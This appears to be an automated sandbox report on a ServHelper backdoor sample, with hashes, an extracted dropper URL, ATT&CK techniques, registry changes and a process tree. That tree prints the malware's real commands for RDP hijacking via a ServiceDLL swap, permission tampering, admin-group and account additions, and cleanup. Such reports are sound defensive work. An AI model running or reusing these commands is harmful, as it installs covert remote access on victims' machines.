servhelper | 6c1c0f44893f2e5bf2290d05b9c031e65a5db7741d96110c5822ec2625bc0e92

Analysis

max time kernel
103s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
18-04-2022 15:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6c1c0f44893f2e5bf2290d05b9c031e65a5db7741d96110c5822ec2625bc0e92.exe
Size

3.4MB
MD5

5e1a581185a9e63ea8e8228b4737958b
SHA1

ffceda102fc3fe2663f848993be435bce1a17fd3
SHA256

6c1c0f44893f2e5bf2290d05b9c031e65a5db7741d96110c5822ec2625bc0e92
SHA512

01e509d9a2af443e8c0320e3d3e656bd52d4244fe8d451cedbc2abd0bdef496c9a9e3e52639199b3a88425abe40dc011255876523f4f5ee18e2c59edee75df58

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 10 IoCs

Processes:

powershell.exe

flow	pid	process
26	2952	powershell.exe
28	2952	powershell.exe
29	2952	powershell.exe
30	2952	powershell.exe
31	2952	powershell.exe
33	2952	powershell.exe
35	2952	powershell.exe
37	2952	powershell.exe
39	2952	powershell.exe
41	2952	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exe

pid process

3604 icacls.exe
1852 icacls.exe
2304 icacls.exe
2176 icacls.exe
2856 icacls.exe
3460 icacls.exe
4860 takeown.exe
3880 icacls.exe
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
3604	icacls.exe
1852	icacls.exe
2304	icacls.exe
2176	icacls.exe
2856	icacls.exe
3460	icacls.exe
4860	takeown.exe
3880	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Branding\mediasrv.png	upx
C:\Windows\Branding\mediasvc.png	upx

Loads dropped DLL 2 IoCs

Processes:

pid process

3896
3896
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

2856 icacls.exe
3460 icacls.exe
4860 takeown.exe
3880 icacls.exe
3604 icacls.exe
1852 icacls.exe
2304 icacls.exe
2176 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

pid	process
3896
3896

pid	process
2856	icacls.exe
3460	icacls.exe
4860	takeown.exe
3880	icacls.exe
3604	icacls.exe
1852	icacls.exe
2304	icacls.exe
2176	icacls.exe

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe

Drops file in Windows directory 18 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_xclgixdw.uo2.psm1	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGID14B.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGID15C.tmp	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGID18B.tmp	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_oyzbhidt.y51.ps1	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGID0FC.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGID1AC.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1456 2072 WerFault.exe 6c1c0f44893f2e5bf2290d05b9c031e65a5db7741d96110c5822ec2625bc0e92.exe

pid	pid_target	process	target process
1456	2072	WerFault.exe	6c1c0f44893f2e5bf2290d05b9c031e65a5db7741d96110c5822ec2625bc0e92.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1036 reg.exe
Runs net.exe

pid	process
1036	reg.exe

Script User-Agent 5 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	28	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	29	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1
HTTP User-Agent header	30	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	31	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1
HTTP User-Agent header	33	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exe

pid process

4720 powershell.exe
4720 powershell.exe
4720 powershell.exe
4720 powershell.exe
4720 powershell.exe
2952 powershell.exe
2952 powershell.exe
Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

648
648

pid	process
4720	powershell.exe
4720	powershell.exe
4720	powershell.exe
4720	powershell.exe
4720	powershell.exe
2952	powershell.exe
2952	powershell.exe

pid	process
648
648

Suspicious use of AdjustPrivilegeToken 15 IoCs

Processes:

powershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4720	powershell.exe
Token: SeRestorePrivilege	3604	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	4656	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4656	WMIC.exe
Token: SeAuditPrivilege	4656	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4656	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4656	WMIC.exe
Token: SeAuditPrivilege	4656	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3340	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3340	WMIC.exe
Token: SeAuditPrivilege	3340	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3340	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3340	WMIC.exe
Token: SeAuditPrivilege	3340	WMIC.exe
Token: SeDebugPrivilege	2952	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6c1c0f44893f2e5bf2290d05b9c031e65a5db7741d96110c5822ec2625bc0e92.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exe

description	pid	process	target process
PID 2072 wrote to memory of 4720	2072	6c1c0f44893f2e5bf2290d05b9c031e65a5db7741d96110c5822ec2625bc0e92.exe	powershell.exe
PID 2072 wrote to memory of 4720	2072	6c1c0f44893f2e5bf2290d05b9c031e65a5db7741d96110c5822ec2625bc0e92.exe	powershell.exe
PID 4720 wrote to memory of 948	4720	powershell.exe	csc.exe
PID 4720 wrote to memory of 948	4720	powershell.exe	csc.exe
PID 948 wrote to memory of 4516	948	csc.exe	cvtres.exe
PID 948 wrote to memory of 4516	948	csc.exe	cvtres.exe
PID 4720 wrote to memory of 4860	4720	powershell.exe	takeown.exe
PID 4720 wrote to memory of 4860	4720	powershell.exe	takeown.exe
PID 4720 wrote to memory of 3880	4720	powershell.exe	icacls.exe
PID 4720 wrote to memory of 3880	4720	powershell.exe	icacls.exe
PID 4720 wrote to memory of 3604	4720	powershell.exe	icacls.exe
PID 4720 wrote to memory of 3604	4720	powershell.exe	icacls.exe
PID 4720 wrote to memory of 1852	4720	powershell.exe	icacls.exe
PID 4720 wrote to memory of 1852	4720	powershell.exe	icacls.exe
PID 4720 wrote to memory of 2304	4720	powershell.exe	icacls.exe
PID 4720 wrote to memory of 2304	4720	powershell.exe	icacls.exe
PID 4720 wrote to memory of 2176	4720	powershell.exe	icacls.exe
PID 4720 wrote to memory of 2176	4720	powershell.exe	icacls.exe
PID 4720 wrote to memory of 2856	4720	powershell.exe	icacls.exe
PID 4720 wrote to memory of 2856	4720	powershell.exe	icacls.exe
PID 4720 wrote to memory of 3460	4720	powershell.exe	icacls.exe
PID 4720 wrote to memory of 3460	4720	powershell.exe	icacls.exe
PID 4720 wrote to memory of 2924	4720	powershell.exe	reg.exe
PID 4720 wrote to memory of 2924	4720	powershell.exe	reg.exe
PID 4720 wrote to memory of 1036	4720	powershell.exe	reg.exe
PID 4720 wrote to memory of 1036	4720	powershell.exe	reg.exe
PID 4720 wrote to memory of 404	4720	powershell.exe	reg.exe
PID 4720 wrote to memory of 404	4720	powershell.exe	reg.exe
PID 4720 wrote to memory of 2164	4720	powershell.exe	net.exe
PID 4720 wrote to memory of 2164	4720	powershell.exe	net.exe
PID 2164 wrote to memory of 1864	2164	net.exe	net1.exe
PID 2164 wrote to memory of 1864	2164	net.exe	net1.exe
PID 4720 wrote to memory of 3028	4720	powershell.exe	cmd.exe
PID 4720 wrote to memory of 3028	4720	powershell.exe	cmd.exe
PID 3028 wrote to memory of 3668	3028	cmd.exe	cmd.exe
PID 3028 wrote to memory of 3668	3028	cmd.exe	cmd.exe
PID 3668 wrote to memory of 3216	3668	cmd.exe	net.exe
PID 3668 wrote to memory of 3216	3668	cmd.exe	net.exe
PID 3216 wrote to memory of 4992	3216	net.exe	net1.exe
PID 3216 wrote to memory of 4992	3216	net.exe	net1.exe
PID 4720 wrote to memory of 2428	4720	powershell.exe	cmd.exe
PID 4720 wrote to memory of 2428	4720	powershell.exe	cmd.exe
PID 2428 wrote to memory of 4140	2428	cmd.exe	cmd.exe
PID 2428 wrote to memory of 4140	2428	cmd.exe	cmd.exe
PID 4140 wrote to memory of 3176	4140	cmd.exe	net.exe
PID 4140 wrote to memory of 3176	4140	cmd.exe	net.exe
PID 3176 wrote to memory of 1704	3176	net.exe	net1.exe
PID 3176 wrote to memory of 1704	3176	net.exe	net1.exe
PID 1952 wrote to memory of 4388	1952	cmd.exe	net.exe
PID 1952 wrote to memory of 4388	1952	cmd.exe	net.exe
PID 4388 wrote to memory of 1004	4388	net.exe	net1.exe
PID 4388 wrote to memory of 1004	4388	net.exe	net1.exe
PID 4720 wrote to memory of 1240	4720	powershell.exe	cmd.exe
PID 4720 wrote to memory of 1240	4720	powershell.exe	cmd.exe
PID 1328 wrote to memory of 628	1328	cmd.exe	net.exe
PID 1328 wrote to memory of 628	1328	cmd.exe	net.exe
PID 628 wrote to memory of 1772	628	net.exe	net1.exe
PID 628 wrote to memory of 1772	628	net.exe	net1.exe
PID 4720 wrote to memory of 4812	4720	powershell.exe	cmd.exe
PID 4720 wrote to memory of 4812	4720	powershell.exe	cmd.exe
PID 4800 wrote to memory of 1452	4800	cmd.exe	net.exe
PID 4800 wrote to memory of 1452	4800	cmd.exe	net.exe
PID 1452 wrote to memory of 2568	1452	net.exe	net1.exe
PID 1452 wrote to memory of 2568	1452	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\6c1c0f44893f2e5bf2290d05b9c031e65a5db7741d96110c5822ec2625bc0e92.exe
"C:\Users\Admin\AppData\Local\Temp\6c1c0f44893f2e5bf2290d05b9c031e65a5db7741d96110c5822ec2625bc0e92.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2072
- \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
  -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4720
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\caszycqu\caszycqu.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:948
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFB0E.tmp" "c:\Users\Admin\AppData\Local\Temp\caszycqu\CSC3238F5C4E7A145EC8B59CF9888CAC950.TMP"
      4⤵
      PID:4516
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4860
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3880
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3604
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1852
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2304
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2176
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2856
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3460
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2924
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:1036
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:404
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2164
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:1864
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3028
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3668
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3216
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:4992
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2428
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4140
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3176
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1704
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:1240
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:4812
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2072 -s 480
  2⤵
  - Program crash
  PID:1456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2072 -ip 2072
1⤵
PID:4736

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:1952
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Ghar4f5 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4388
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
    3⤵
    PID:1004

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc R9JHrYoA /add
1⤵
